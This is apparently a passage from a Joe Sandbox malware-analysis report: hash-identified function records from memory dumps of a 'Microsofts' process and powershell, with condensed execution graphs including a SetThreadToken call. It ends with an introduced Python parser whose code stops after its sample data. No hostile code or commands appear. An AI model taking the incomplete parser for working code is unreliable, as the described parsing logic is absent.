                                                                                                                                        • Instruction ID: e9eb49fa412253376556e3aaf2b44f286d40ed2c8e7e747f14b8ec2a2e91eaca
                                                                                                                                        • Opcode Fuzzy Hash: 1d5a0bc306f9ad70484f1ec265fc3a728e58700169604975160343c7721c7fc9
                                                                                                                                        • Instruction Fuzzy Hash: 20319331B002089FDB08EB78D855AAF7BEAEF89301F144579E509DB391DF359D128790
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H`r
                                                                                                                                        • API String ID: 0-2871800212
                                                                                                                                        • Opcode ID: 851e442d0d6b2165feec747c8f75606a48ec4ca198beb72ee7cbe05ad004df7e
                                                                                                                                        • Instruction ID: 4e55f52255ae8e8c63e74eddd57be89ba5c6f36cbcb079b301dd7827cb3e193f
                                                                                                                                        • Opcode Fuzzy Hash: 851e442d0d6b2165feec747c8f75606a48ec4ca198beb72ee7cbe05ad004df7e
                                                                                                                                        • Instruction Fuzzy Hash: BF21D3316002459FDB08EF78C991B6E7BA6FF8A310F258169E5069B395DF31AE11CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a6f5a2075bc7fe5737a34cf4cb047911ab08ebd707f588e6ddf6a93f073e0445
                                                                                                                                        • Instruction ID: 817aec8b99bdd532c47e98e1de6749af62f69f82aaaa6b139d900667116d524c
                                                                                                                                        • Opcode Fuzzy Hash: a6f5a2075bc7fe5737a34cf4cb047911ab08ebd707f588e6ddf6a93f073e0445
                                                                                                                                        • Instruction Fuzzy Hash: 3751F672B003059FCB149A69D855AABFBE9EBCD324F14853AE518DB351DB35E80187A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dab983deb8fbeb10e06ec2aa8c3740d523089a0130acc3211406f15c0ddf1061
                                                                                                                                        • Instruction ID: 7eaab76a9b37ec0800df92691149d00040cfefeda634a8f3025b44c8a63c9691
                                                                                                                                        • Opcode Fuzzy Hash: dab983deb8fbeb10e06ec2aa8c3740d523089a0130acc3211406f15c0ddf1061
                                                                                                                                        • Instruction Fuzzy Hash: 9941A174E012189FCB48DFAAD884A9DBBF2BF8A300F249569E405BB364DB346845CF14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ca61e4fe6fe2429e2aceb74299b663107dd078944f7bb484684c1102f9890412
                                                                                                                                        • Instruction ID: 5f140447f71c07cf29bb9bb9c4a6bde510c77c3e56ee8d53af017091041ad54d
                                                                                                                                        • Opcode Fuzzy Hash: ca61e4fe6fe2429e2aceb74299b663107dd078944f7bb484684c1102f9890412
                                                                                                                                        • Instruction Fuzzy Hash: 85418274E01218DFDB48DFAAD884A9DBBF2BF8A300F249569E405BB364DB346945CF14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f1da02384cb1fb829805c0f365c568efdef4fdfa19d7b3f4ca287e4b85fedfe3
                                                                                                                                        • Instruction ID: 9f3f7f951f439ea66f24673291da5a4c5fdcae8ed9edaf01a41eb39d0be73418
                                                                                                                                        • Opcode Fuzzy Hash: f1da02384cb1fb829805c0f365c568efdef4fdfa19d7b3f4ca287e4b85fedfe3
                                                                                                                                        • Instruction Fuzzy Hash: AB31CF39CE270B9FD2002B35A5AD37BBBF4FF2F32B7046E01E50A905148B3099A4CA14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24167587675.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_e5d000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5b48185011e30bab4c6a8fbf037af71f9e7b12bc30ef219ee573a5543b31df1
                                                                                                                                        • Instruction ID: da5aae69662dc1356cb9b906f75fea623a2dd72e0633609824f94cd2e3883a45
                                                                                                                                        • Opcode Fuzzy Hash: e5b48185011e30bab4c6a8fbf037af71f9e7b12bc30ef219ee573a5543b31df1
                                                                                                                                        • Instruction Fuzzy Hash: 09315C7550D3C49FCB13CB24D994711BF71AB46314F29C5EBD8898F2A7C23A981ACB62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8dc8089b2eed15f8e4cdc77d65a3e6e8b53c18075534e065fe2ca321a7a47092
                                                                                                                                        • Instruction ID: 0c94d3dfb75662ab8e015a35c006acefaab036f23384e53cb1b970b18cf13428
                                                                                                                                        • Opcode Fuzzy Hash: 8dc8089b2eed15f8e4cdc77d65a3e6e8b53c18075534e065fe2ca321a7a47092
                                                                                                                                        • Instruction Fuzzy Hash: B2218135A002049FCF54DB28C4509FF3BA9EBDE368F188459D859AB254EB30EE05CBD2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 335e41bb2804e5f143094d0eba2ac35802d0cf7793a705b1281ac0a3dad271fd
                                                                                                                                        • Instruction ID: 4d96afdb051b5d1cc8b9c313029cb14b69cb57f584b23f100cfcdbc936b08104
                                                                                                                                        • Opcode Fuzzy Hash: 335e41bb2804e5f143094d0eba2ac35802d0cf7793a705b1281ac0a3dad271fd
                                                                                                                                        • Instruction Fuzzy Hash: A4212431D11659DECB00EFE8D8446ECFBB4FF4A304F509626E50477294EB706A5ACB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24167587675.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_e5d000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9e568c1e7e4bf29388acc8101977a28acbc56062c1c54e8f96d10511346edae9
                                                                                                                                        • Instruction ID: 5dbed296293c252afa74d9505253ba2a40fdf51ed29e1fe1378bfa50fc5fc32b
                                                                                                                                        • Opcode Fuzzy Hash: 9e568c1e7e4bf29388acc8101977a28acbc56062c1c54e8f96d10511346edae9
                                                                                                                                        • Instruction Fuzzy Hash: C021D671508340DFDB20DF14D9C0B26BB66EB84314F24C96ADC495B296C77AD84ACA62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 57c52f1d850c80192dc921a4faab2603ea0f37722f3417f75db6936177d5e9c7
                                                                                                                                        • Instruction ID: 8b80e716337db7ed719edb16e046c056ef2c7a63eb136c7457999d8befca7a91
                                                                                                                                        • Opcode Fuzzy Hash: 57c52f1d850c80192dc921a4faab2603ea0f37722f3417f75db6936177d5e9c7
                                                                                                                                        • Instruction Fuzzy Hash: 0611E4757053148FD7199B78E854A2A77E5EF8E60031605ABE505DB391EF25EC00CBA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6bcd02e84dbe77cf3264a76ac4c6184d876961959ac760c445c021ae2a900407
                                                                                                                                        • Instruction ID: 2072ba4c620950b7181fbbd5227e70d567692fd93ddc2a2ebccfe5decefd9a39
                                                                                                                                        • Opcode Fuzzy Hash: 6bcd02e84dbe77cf3264a76ac4c6184d876961959ac760c445c021ae2a900407
                                                                                                                                        • Instruction Fuzzy Hash: A1219074E002089FDB05EFB9D4513AEBBB2EF89309F1084AAD815BB394DB745945CF41
                                                                                                                                        Memory Dump Source
• Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 782b9791cb5d5318ed10e3ac4642541cf712817cb7887b49d6789c1acf6ac031
• Instruction ID: ebb4bcd766216e05825c3dc850fe51e8614379208927a9642d17bcbe1bca3165
• Opcode Fuzzy Hash: 782b9791cb5d5318ed10e3ac4642541cf712817cb7887b49d6789c1acf6ac031
• Instruction Fuzzy Hash: 7B118C76300200CFD714DB69D944E66B7E6EFCA725B2085AAF50A8F361CBB1EC40CB50

The fifteen function records that follow share the same Memory Dump Source (Source File 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset 00EA0000, based on PE: false), the same Joe Sandbox IDA Plugin Snapshot File (hcaresult_6_2_ea0000_Microsofts.jbxd) and the same empty Similarity fields (API ID, String ID, API String ID), so those lines are not repeated; only the per-function identifiers and hashes are listed. In every record the Opcode Fuzzy Hash is identical to the Opcode ID.

Memory Dump Source
• Opcode ID: 6a9cf2a004831e94ed7f43ea5843d1a7707eac8f56f4b3f3485e76c3db52a1fe
• Instruction ID: df93fb17dcbc6df7955e0dc97157163d95b471c68c78cc1afac584394f9ea38d
• Opcode Fuzzy Hash: 6a9cf2a004831e94ed7f43ea5843d1a7707eac8f56f4b3f3485e76c3db52a1fe
• Instruction Fuzzy Hash: 43213470C0420A8FCB04DFA8D9445EEBFF0EF4A304F0451AAD449BB264EB355A84CFA1

Memory Dump Source
• Opcode ID: 618ffc4146ec310c561c42f246cdff44bec678ea50044bb8c70fadc9adf20681
• Instruction ID: f5c4a56014af6af306a9b62c188f58d8ab5dd03db9694d44bbecebc30105a8e4
• Opcode Fuzzy Hash: 618ffc4146ec310c561c42f246cdff44bec678ea50044bb8c70fadc9adf20681
• Instruction Fuzzy Hash: 5D11A331E003098BCB24EFB8848069EBBF2AF8D315B141539D805FB202DB31AC01C7A1

Memory Dump Source
• Opcode ID: 8e18c3b5da1bb4529d97f3a1a0dd280efd4bba596571e562fca2068a68919d16
• Instruction ID: 172bf06f38084ce053f08fa8452eaceaf20553f8a7f681cde0b41b15dc2fe6c4
• Opcode Fuzzy Hash: 8e18c3b5da1bb4529d97f3a1a0dd280efd4bba596571e562fca2068a68919d16
• Instruction Fuzzy Hash: 0E01D272B043500FDB189B79985453E7BDA9ECA2683144479D404DB398ED68DC018792

Memory Dump Source
• Opcode ID: 775843d48023f20e121b249232b4f9531d51c1673504f3b3c48d8ef11ce793d9
• Instruction ID: 49be489a8ab21c0d67aed0f1de78c0830c63b8a08f1e912676080b3bcdf862ee
• Opcode Fuzzy Hash: 775843d48023f20e121b249232b4f9531d51c1673504f3b3c48d8ef11ce793d9
• Instruction Fuzzy Hash: 0B01B1B67013109FD7188F68E88496AB7A8FB8D714716567AE105DB310EB31FD40CBA1

Memory Dump Source
• Opcode ID: 22a6f01a4b7900887504198a10dc18cee16f79591f0c328c3997fe704225db51
• Instruction ID: 6d04f736915cdafed55bcf52eb12e4664bc40655f1585cdace74e7786d2b6620
• Opcode Fuzzy Hash: 22a6f01a4b7900887504198a10dc18cee16f79591f0c328c3997fe704225db51
• Instruction Fuzzy Hash: AF01F272B002100FD728AB7D980453E7ADBAFC83683144039E905DB398FEB8DC014B92

Memory Dump Source
• Opcode ID: 9baf5163d0932288b5773645611810a6e09a12e16341d2e3317817825acca1fc
• Instruction ID: 1870f6951c01bc5fb004631286cb7c5b4520e71de8e35084959a2b388e637dd2
• Opcode Fuzzy Hash: 9baf5163d0932288b5773645611810a6e09a12e16341d2e3317817825acca1fc
• Instruction Fuzzy Hash: 5901D6367003049BCB156778D859B6B3FD6EBC9625F140526E60AC7385DF35DD11C790

Memory Dump Source
• Opcode ID: 2604c40c1d7f008e0e45030eb36ef43ffc6d03088a1c7310df0b0bf93cae43b2
• Instruction ID: 42d7655ead27a88041fe56e46aa7803e6c3d7eba835afb79736c852f2e979812
• Opcode Fuzzy Hash: 2604c40c1d7f008e0e45030eb36ef43ffc6d03088a1c7310df0b0bf93cae43b2
• Instruction Fuzzy Hash: 06018075E002099FDF14AF69D854AAF7BB5EF88310B00453AEE1597240DB309D10CBE1

Memory Dump Source
• Opcode ID: bb5adeb346e2e30e9f18ef36487090796238f520bb3e9a674db1486bce737130
• Instruction ID: 048f7d76b5a8e2b6529476afc5f0eb82fbb2d9bd5a492c9b0c82825951993730
• Opcode Fuzzy Hash: bb5adeb346e2e30e9f18ef36487090796238f520bb3e9a674db1486bce737130
• Instruction Fuzzy Hash: 61015E75E00259AFCB15DF69D8546AEBFB5EB88314B04453AEA15D3241D7308D20DB92

Memory Dump Source
• Opcode ID: d0e82e465ecd78447d7ac15b84dc1faf6dd0aa5a78d9e77670f5ff80fd0cdb4c
• Instruction ID: 1ac1863941f0d474ba950b60d758b3a451305626dc56a6e2d76c4142e0586410
• Opcode Fuzzy Hash: d0e82e465ecd78447d7ac15b84dc1faf6dd0aa5a78d9e77670f5ff80fd0cdb4c
• Instruction Fuzzy Hash: 99F024327041159BCB159A7AE44069EBBE9DFCA331B04007AF108EF351CF72EC028750

Memory Dump Source
• Opcode ID: 762d35bd451d11e8af0650e76f4a3de1f153f5835bbaff2e828b2973aecece8b
• Instruction ID: 70fda5806dcf5ca51ad2992440880e0efbe7e716486268ffc5eb9006cf058d5a
• Opcode Fuzzy Hash: 762d35bd451d11e8af0650e76f4a3de1f153f5835bbaff2e828b2973aecece8b
• Instruction Fuzzy Hash: CEF090B2A00208AF8B50DFAAD841ADFBBF5FB8C210B10453AE505E3201E770A9159BE1

Memory Dump Source
• Opcode ID: f54e3a1d900acdce34205706f5bf5fe4335b8188c1b1b3ae33d4a074765e7e01
• Instruction ID: 0e8f51d87e2e768e6603eab6e0f93568c1b53823954aed6b4e7bdac9db67a819
• Opcode Fuzzy Hash: f54e3a1d900acdce34205706f5bf5fe4335b8188c1b1b3ae33d4a074765e7e01
• Instruction Fuzzy Hash: D2F03A353002059FC700DF59D484D5ABBEAFF8D7257554169E6098B331CB71AC11CB80

Memory Dump Source
• Opcode ID: 71a8aca28fed6523b16a2afb688d68311f7c322b36beedc32a61d22142880b86
• Instruction ID: 245b4eb3c05a578c36a7d2c54757b063a0796463bbf64c3752e42fcbcc14b594
• Opcode Fuzzy Hash: 71a8aca28fed6523b16a2afb688d68311f7c322b36beedc32a61d22142880b86
• Instruction Fuzzy Hash: 23F0C936026B868FE3192B22ADBC23A7F64EB0B317B442C41E54AA6071DFB51458CF55

Memory Dump Source
• Opcode ID: 6f24e15a16f584a232871496205a66809c91b375dbd465ba0af42e2aacbe5736
• Instruction ID: 98a3dce8c171c64ddb072b5a6c4f4a167e2926664fe09346217e2612e15c1fbb
• Opcode Fuzzy Hash: 6f24e15a16f584a232871496205a66809c91b375dbd465ba0af42e2aacbe5736
• Instruction Fuzzy Hash: ECE0B636021B468FE3182B22BCBD23E7A65FB0B317B802C00E10EB10709FB0104CCE54

Memory Dump Source
• Opcode ID: 5bb26711c4fa7b462dd1c9b063b33a6d55fc92405635858e24c95f11878aa9b5
• Instruction ID: ca98b5a909ef0865fc3d706ab27091b95879f411cb6993dc392d5b0ffd56646b
• Opcode Fuzzy Hash: 5bb26711c4fa7b462dd1c9b063b33a6d55fc92405635858e24c95f11878aa9b5
• Instruction Fuzzy Hash: 9FE08672D203255BCB02DFA4D8505EEB774EFD1311F954626D41473440F771155ACA91

Memory Dump Source
• Opcode ID: 150c806125e506545a74513719911e9d8789f2510dd1d54bdb3045710e83f9d2
• Instruction ID: bce6413893972e748ec87163d947137af82a964163fa7852c34761ae07f26f1b
• Opcode Fuzzy Hash: 150c806125e506545a74513719911e9d8789f2510dd1d54bdb3045710e83f9d2
• Instruction Fuzzy Hash: C4D01231D2032A578B00A7A9DC144DEBB38EED5725B544626D51437140EB702659C6A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 640688851e02cf66430dae6cdee958f05b8628eb773548bd573156ede9986f66
                                                                                                                                        • Instruction ID: 345a843a1380eea66c88ae818321dd052f20704bcda0dcd9363903df805a4ad2
                                                                                                                                        • Opcode Fuzzy Hash: 640688851e02cf66430dae6cdee958f05b8628eb773548bd573156ede9986f66
                                                                                                                                        • Instruction Fuzzy Hash: ADD0C73A740114674B152A49A8048AF7BAEE7CD7727048126F91A83340CE714D2197D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e96bfb20e0ad62e2b09e4bcee41ad2f51dde2185893da2f425060ff834d56465
                                                                                                                                        • Instruction ID: 391a8d996efe6ba4c79ba733c5836388f53c54f22443a9369492b7a39979f608
                                                                                                                                        • Opcode Fuzzy Hash: e96bfb20e0ad62e2b09e4bcee41ad2f51dde2185893da2f425060ff834d56465
                                                                                                                                        • Instruction Fuzzy Hash: 8AC08C31808A948FCF130B20C8AA1507BF0ED0360030400C0C4924600AC2146523CF44
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r
                                                                                                                                        • API String ID: 0-3954137160
                                                                                                                                        • Opcode ID: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
                                                                                                                                        • Instruction ID: 52adda4ebcdcdd8a58676c7730806b5dcb3d4d73080a1ac8795522d4e6842570
                                                                                                                                        • Opcode Fuzzy Hash: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
                                                                                                                                        • Instruction Fuzzy Hash: 75316571E0131A8BDFA4CF7C85413AEB6E6AF9A314F1450EAC519BB250EB30DD409B92

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 9
Total number of Limit Nodes: 0
Execution graph (node addresses; both the 8f80a01 and the 8f80a08 path reach the SetThreadToken call at 8f80a4b):
  8f82f50 -> 8f82fad, 8f83005
  8f82fad -> 8f83005, 8f80a08, 8f80a01
  8f80a08 -> 8f80a4b (SetThreadToken) -> 8f80a79 -> 8f83005
  8f80a01 -> 8f80a4b (SetThreadToken) -> 8f80a79 -> 8f83005

Control-flow Graph (legend: Executed / Not Executed)

  6ccaa99-6ccaac1 -> 6ccaac6-6ccae01 (calls 6cca704), 6ccaac3
  6ccaac3 -> 6ccaac6-6ccae01
  6ccaac6-6ccae01 -> 6ccae06-6ccae0d
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7097bb07f4360b1b33a6b4c5c8736213301d16f87e3b9e4b6d23fdd40b657a83
• Instruction ID: fbaf4d8c5f57fce02aa438a2474d88c715eb9180a11eb8099a723e00fff63a22
• Opcode Fuzzy Hash: 7097bb07f4360b1b33a6b4c5c8736213301d16f87e3b9e4b6d23fdd40b657a83
• Instruction Fuzzy Hash: 33919071F007145FDB5AEBB888055AEBBE2EFC4704B04892DD506AB384DF34A9458B97

Control-flow Graph (legend: Executed / Not Executed)

  6ccaaa8-6ccaac1 -> 6ccaac6-6ccae01 (calls 6cca704), 6ccaac3
  6ccaac3 -> 6ccaac6-6ccae01
  6ccaac6-6ccae01 -> 6ccae06-6ccae0d
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34df9bb97fe2d109de167277cca7003fb6e6edda307cbfdd5485222e45ff2ed3
• Instruction ID: e853efcb165f33692953372dd3f45b71d541b8c97fbe8bd74118a0ddb3bcefd4
• Opcode Fuzzy Hash: 34df9bb97fe2d109de167277cca7003fb6e6edda307cbfdd5485222e45ff2ed3
• Instruction Fuzzy Hash: 9191A071F007185BDB59EFB888045AEBAE2EFC4704B04892DD506AB384DF34A9458B9B
Strings
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$tP\r$tP\r$tP\r$tP\r$tP\r$tP\r$$\r$$\r$$\r
• API String ID: 0-3195921003
• Opcode ID: 1213812b546d04a48a903ada485869bcec47c06c0314713fa77c3ffdfb56b3fd
• Instruction ID: 6fe58fe62e8abc68547c52b2bec2c691be707f568e04436a5b311795b975b52f
• Opcode Fuzzy Hash: 1213812b546d04a48a903ada485869bcec47c06c0314713fa77c3ffdfb56b3fd
• Instruction Fuzzy Hash: 5CB25CB2B04306DFEB118B6885157AABBF1BF86251F14C8BBD445CB256DB71CC42C7A2

Control-flow Graph (legend: Executed / Not Executed)

  Basic blocks 77d3ce8-77d43ea (graph node ids 461-632), entry block 77d3ce8-77d3d0d, no calls; the raw node/edge dump of the graph image is not reproduced here.
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'\r$4'\r$4'\r$4'\r
• API String ID: 0-1723783688
• Opcode ID: 4b335c9f694b5c929abc430a135ee37b7b036b54e927dcd31a72dfde987a5275
• Instruction ID: 103943b1139b6d18fb2b2db3d3f5c781a38c6d0ab9b87307b5f936d7811588e8
• Opcode Fuzzy Hash: 4b335c9f694b5c929abc430a135ee37b7b036b54e927dcd31a72dfde987a5275
• Instruction Fuzzy Hash: 26124AB1704381DFDB159B68C8117AABBF29FC6290F1488BBD905CB296DB71DC41C7A2

Control-flow Graph (legend: Executed / Not Executed)

  8f80a01-8f80a77 (calls SetThreadToken) -> 8f80a79-8f80a7f, 8f80a80-8f80a9d
  8f80a79-8f80a7f -> 8f80a80-8f80a9d
APIs: SetThreadToken
Memory Dump Source
• Source File: 00000007.00000002.23033692188.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8f80000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
• Instruction ID: 2bf50c68e3f1aed681c79f6ef10f7d78e8a2f9400769910bbe9337a17411af90
• Opcode Fuzzy Hash: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
• Instruction Fuzzy Hash: 901116B1A006488FDB10CFA9D884BDEFBF4EB89324F24841AD459A7350C774A944CFA5

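A parser for these per-function records, added here as an example (it is not part of the Joe Sandbox report and not Joe Security code). It turns the "Memory Dump Source" / "Similarity" blocks into structured records keyed by process, dump and Opcode ID so they can be pivoted on across reports, pulls out the functions that carry an API ID (here the SetThreadToken function in the powershell dump at 08F80000), and cross-checks the base address embedded in the .sdmp file name against the "Offset:" field. The sample input is two records copied from this listing. The meaning of the .sdmp name fields after the base address is not given on this page, so the parser keeps them verbatim rather than decoding them.

```python
"""Parse Joe Sandbox per-function "Memory Dump Source"/"Similarity" records.

Added example, not part of the Joe Sandbox report. Only the process index,
dump index, dump id and base address of the .sdmp name are decoded; the
trailing fields are not documented on the page and are kept as-is.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: two records copied from this report's function listing
# (process 6 / Microsofts dump at 00EA0000, process 7 / powershell dump at 08F80000).
SAMPLE = """\
Memory Dump Source
• Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
Similarity
• API ID:
• String ID: X`r$X`r$X`r$X`r
• API String ID: 0-3954137160
• Opcode ID: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
• Instruction ID: 52adda4ebcdcdd8a58676c7730806b5dcb3d4d73080a1ac8795522d4e6842570
• Opcode Fuzzy Hash: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
• Instruction Fuzzy Hash: 75316571E0131A8BDFA4CF7C85413AEB6E6AF9A314F1450EAC519BB250EB30DD409B92
Memory Dump Source
• Source File: 00000007.00000002.23033692188.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8f80000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
• Instruction ID: 2bf50c68e3f1aed681c79f6ef10f7d78e8a2f9400769910bbe9337a17411af90
• Opcode Fuzzy Hash: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
• Instruction Fuzzy Hash: 901116B1A006488FDB10CFA9D884BDEFBF4EB89324F24841AD459A7350C774A944CFA5
"""

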